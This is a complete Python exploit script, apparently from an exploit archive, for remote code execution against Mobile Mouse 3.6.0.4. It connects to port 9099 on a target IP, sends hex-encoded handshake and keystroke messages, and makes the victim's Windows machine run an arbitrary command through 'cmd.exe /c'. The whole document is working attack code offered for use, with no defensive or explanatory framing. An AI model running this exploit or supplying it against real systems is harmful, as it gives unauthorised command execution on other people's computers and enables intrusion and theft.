# Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution 

#!/usr/bin/env python3

import socket
from time import sleep
import argparse

help_text = "Mobile Mouse 3.6.0.4 Remote Code Execution"
parser = argparse.ArgumentParser(description=help_text)
parser.add_argument("--target", help="Target IP", required=True)
parser.add_argument("--cmd", help="Command to execute", required=True)

args = parser.parse_args()

host = args.target
command = args.cmd
port = 9099  # Default Port

# Create a socket connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((host, port))
except Exception as e:
    print(f"Error connecting to {host}:{port}")
    print(e)
    exit(1)

# Connection sequence
CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04")
s.send(CONN)
sleep(0.5)

# Send the RUN command
RUN = bytearray.fromhex("4b45591e3131341e721e4f505404")
s.send(RUN)
sleep(0.5)

# Prepare and send the command
command_string = f"cmd.exe /c {command}".encode('utf-8')
hex_command = command_string.hex()
COMMAND = bytearray.fromhex("4B45591E3130301E" + hex_command + "1E04" + "4b45591e2d311e454e5445521e04")
s.send(COMMAND)
sleep(0.5)

# Receive and print the response (for debugging)
try:
    response = s.recv(1024)
    print(response.decode())
except Exception as e:
    print("Error receiving response")
    print(e)

print("Command executed, closing connection.")
s.close()
